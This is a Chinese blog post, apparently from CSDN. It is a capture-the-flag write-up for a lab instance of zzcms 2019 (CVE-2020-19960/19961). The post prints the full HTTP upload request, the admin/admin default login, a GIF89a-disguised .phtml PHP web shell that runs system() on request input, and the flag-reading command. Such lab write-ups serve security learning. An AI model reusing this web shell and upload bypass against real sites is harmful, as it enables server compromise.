[春秋云镜]CVE-2020-19960,CVE-2020-19961

已于 2022-12-03 21:17:50 修改
阅读量5.8k 收藏 5
点赞数
分类专栏: 靶场 春秋云镜 文章标签: 安全 web安全
于 2022-12-03 15:50:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niubi707/article/details/128162503
版权

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!


靶场介绍

zz cms 2019 存在sql注入漏洞 (CVE-2020-19960,CVE-2020-19961即可通关文件上传漏洞获取flag)

春秋云镜开启靶场:

http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/

后台

http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/admin/login.php

账号admin 密码admin

登录进来找上传点

 http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadimg_form.php?noshuiyin=1&imgid=2

 

 

上传一张图片 修改后缀为.phtml

POST /uploadimg.php HTTP/1.1
Host: eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------193076518811279314343225962366
Content-Length: 664
Origin: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadimg_form.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669902296,1669945756,1669953976,1670045049; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1670050507; __tins__713776=%7B%22sid%22%3A%201670052271753%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201670054071753%7D; __51cke__=; __51laig__=1; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; tablename=zzcms_zsclass
Upgrade-Insecure-Requests: 1

-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="g_fu_image[]"; filename="1.phtml"
Content-Type: image/jpeg

GIF89a
<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>



-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="Submit"

提交
-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="noshuiyin"


-----------------------------193076518811279314343225962366
Content-Disposition: form-data; name="imgid"


-----------------------------193076518811279314343225962366--

 

获取flag

http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/uploadfiles/2022-12/20221203074749583.phtml?s=cat%20../../../../../../../../flag

 

春天11-
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DNS Server远程代码执行漏洞复现(CVE-2020-1350)
谢公子的博客
07-26 5091
漏洞描述 2020年7月15日,微软发布补丁修复了一个标注为远程代码执行的DNS Server漏洞,官方分类为“可蠕虫级”高危漏洞,易受攻击的漏洞有可能通过恶意软件在易受攻击的计算机之间传播,而无需用户干预。CVSS评分10分(即高危且易利用),漏洞编号CVE-2020-1350。未经身份验证的攻击者可以发送特殊构造的数据包到目标DNS Server来利用此漏洞,成功利用此漏洞可能达到远程代码执行的效果。如果域控制器上存在DNS服务,攻击者可利用此漏洞获取到域控制器的系统权限。另外,DNS服务器一..
春秋云镜 CVE-2020-19961
qq_22002773的博客
08-19 311
春秋云镜 CVE-2020-19961
春秋云镜靶机
niqiu320的博客
04-10 1456
Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。
ZZCMS201910审计入门和SQL注入
网络设备配置-华为
11-09 651
php代码审计
cve-2020-0796_永恒之黑:CVE20200796漏洞复现
weixin_39826809的博客
11-30 2334
2017年,“永恒之蓝”,3年之后,“永恒之黑” 来了。漏洞介绍3月12日,微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒之黑”。本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码...
ZZCMS201910代码审计
ztK63LrD的博客
09-11 3257
现在开始分析zzcms中 产生sql注入的原理以及代码审计的过程。先用seay审计大概过一遍此cms中可能存在的漏洞,然后在admin/ask.php的文件看到这个可能存在漏洞的点,这里的sql语句中$_COOKIE["askbigclassid"]这个参数可控,此时就有一个想法我是不是可以将我所想查询的内容通过构造特殊的sql语句插入到这个变量中,进行自己想查询的东西,这里是不是就完成了一个sql注入攻击。
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-10673:CVE-2020-10673
05-26
CVE-2020-10673 CVE-2020-10673:jackson-databind RCE
zzcms2019重装漏洞审计
Cvjark的博客
03-28 732
审计cms的重装业务逻辑并实现bypass达到系统重装的目的 漏洞点zzcms.com/install/index.php 附加调试器,访问:http://www.zzcms.com/install/index.php?XDEBUG_SESSION_START=16156(XDEBUG_SESSION_START是调试器附加的)访问结果如下图: 根据页面回显信息,keyword是:/install/install.lock文件,回到index.php代码,索引这个字段,发现0 found 试试全局f
[PHP代码审计]极致CMS1.9存在SQL注入漏洞
Y4tacker的博客
05-25 1193
文章目录写在前面分析 写在前面 本着学习为主的原则,再考虑到利用难度,这里便公开分享挖掘的思路了 分析 尽管这个CMS大部分地方都适用了自带的frparam方法来获取参数,这个函数对我们传入的参数进行了过滤,但不妨有开发者大意的情况,比如下面这个情况就是 漏洞点在于后台的插件配置处,随便安装一个插件,点击配置抓包,其默认为GET请求 但我们跟踪一下底层的代码,在A/c/PluginsController.php下的setconf函数,这里直接将$_POST传入 在A/exts/jizhicmsupdat
php 登录漏洞,PHPCMS用户登陆SQL注入漏洞分析
weixin_33856590的博客
03-11 1273
0x00 简述之前manning在调漏洞的时候,突然发现正常登陆不上去了,当时帮忙跟了下phpcms的登陆流程。之后感觉这个流程貌似有些问题,就仔细看了下,没想到真是一个0day~~0x01 漏洞原理我们先直接看这个漏洞最根源的地方,phpsso/index.php文件所有的操作都存在严重的注入问题,这个类文件的构造函数最先调用它的父构造函数,通过auth_key来解析POST传入的data内容,...
CVE-2020-1967: openssl 拒绝服务漏洞通告
爱国小白帽
04-22 3148
CVE-2020-1967: openssl 拒绝服务漏洞通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月21日, 360CERT监测发现 openssl 官方发布了 TLS 1.3 组件拒绝服务漏洞 的风险通告,该漏洞编号为 CVE-2020-1967,漏洞等级:高危。 openssl 是一个开放源代码的软件库包,应...
制作安全科普馆设计方案时,哪些安全细节不容忽视?
qq_2129354861的博客
06-12 347
在数字多媒体技术的浪潮下,创新的展示方式不仅引领了展厅设计的革新,还为知识内容的传递带来了前所未有的高效与便捷。不同类型的多媒体互动装置,让展厅的展示形式变得多样,我们为了确保展示内容更加明确和有条理,就需要对内容展示区域进行划分,而根据不同的安全主题,便是安全教育馆常用的方式之一,例如按照交通安全、消防安全、网络安全等类型的分类,可以将展示区域划分为不同的主题区域,再针对不同的内容版块,来选用适合的多媒体互动装置,使观众能够更快速地找到自己感兴趣的内容。
厨房燃气安全新保障:红外点式可燃气体报警器的作用
BDjiance的博客
06-13 538
与传统的可燃气体报警器相比,点式报警器具有更高的灵敏度和更快的响应速度。通过实时监测空气中的可燃气体浓度,并在发现异常时及时发出报警信号,它有效降低了燃气泄漏和火灾事故的发生概率。同时,红外技术的应用也使得报警器具有更高的检测精度和更快的响应速度,为家庭安全提供了更加可靠的保障。例如,在某小区的居民家中,由于燃气灶使用不当导致燃气泄漏,幸运的是,家中安装了红外可燃气体报警器。其中,燃气泄漏和火灾是厨房安全的主要隐患。近年来,红外可燃气体报警器因其独特的点式报警和红外技术优势,逐渐成为厨房安全的新守护。
AWS 批量添加安全
最新发布
大鹅的博客
06-17 251
bin/bash# 定义安全组ID-宁夏 VPC:NX-NHRY-PRD-VPC vpc-xxx# 从文件中读取IP地址到数组# 循环遍历内网 IP 列表。
揭秘网络安全攻防战
waitaikong_的博客
06-17 554
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样化和复杂化,防御策略也需要不断地更新和升级以应对新的挑战。
春秋云镜CVE-2020-2551
09-21
春秋云镜是一个安全漏洞扫描平台,它可以帮助用户检测和修复系统中的漏洞。根据引用[2]所提到的信息,春秋云镜可以发现并报告Oracle WebLogic Server产品中的高危漏洞CVE-2020-2551。这个漏洞的CVSS评分为9.8分,表示其危害程度非常高。该漏洞允许攻击者通过基于IIOP协议执行远程代码。因此,春秋云镜可以帮助用户及时发现并修复这个漏洞,以保护系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值